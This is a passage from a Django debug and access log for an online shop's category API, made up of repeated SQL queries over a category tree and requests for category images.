args=(35,) DEBUG 2019-12-13 13:41:03,153 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:41:03,156 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:41:03,158 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:41:03,161 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:41:03,163 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:41:03,166 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:41:03,171 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:41:03,173 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:41:03,175 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:41:03,179 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:41:03,183 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:41:03,186 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:41:03,190 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:41:03,193 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:41:03,196 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:41:03,199 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:41:03,201 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:41:03,204 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:41:03,206 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:41:03,209 utils 19021 139703101101824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:41:03,211 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:41:03,213 utils 19021 139703101101824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:41:03] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:03] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:04] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:05] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:05] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:05] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:05] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:41:05] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [13/Dec/2019 13:45:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:46:40,518 utils 19021 139703090349824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:46:40,540 utils 19021 139703090349824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:46:40,553 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:46:40,561 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:46:40,569 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:46:40,576 utils 19021 139703101101824 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:46:40,582 utils 19021 139703090349824 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:46:40,592 utils 19021 139703101101824 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:46:40,595 utils 19021 139703090349824 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:46:40,605 utils 19021 139703090349824 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) [13/Dec/2019 13:46:40] "GET /api/v1/categories/10 HTTP/1.0" 200 183 DEBUG 2019-12-13 13:46:40,615 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:46:40,625 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:46:40,633 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:46:40,640 utils 19021 139703090349824 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:46:40,646 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:46:40,651 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:46:40,656 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:46:40,660 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:46:40,663 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:46:40,666 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:46:40,669 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:46:40,674 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:46:40,679 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:46:40,683 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:46:40,688 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:46:40,693 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:46:40,701 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:46:40,707 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:46:40,711 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:46:40,714 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:46:40,717 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:46:40,720 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:46:40,724 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:46:40,729 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:46:40,732 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:46:40,736 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:46:40,739 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:46:40,743 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 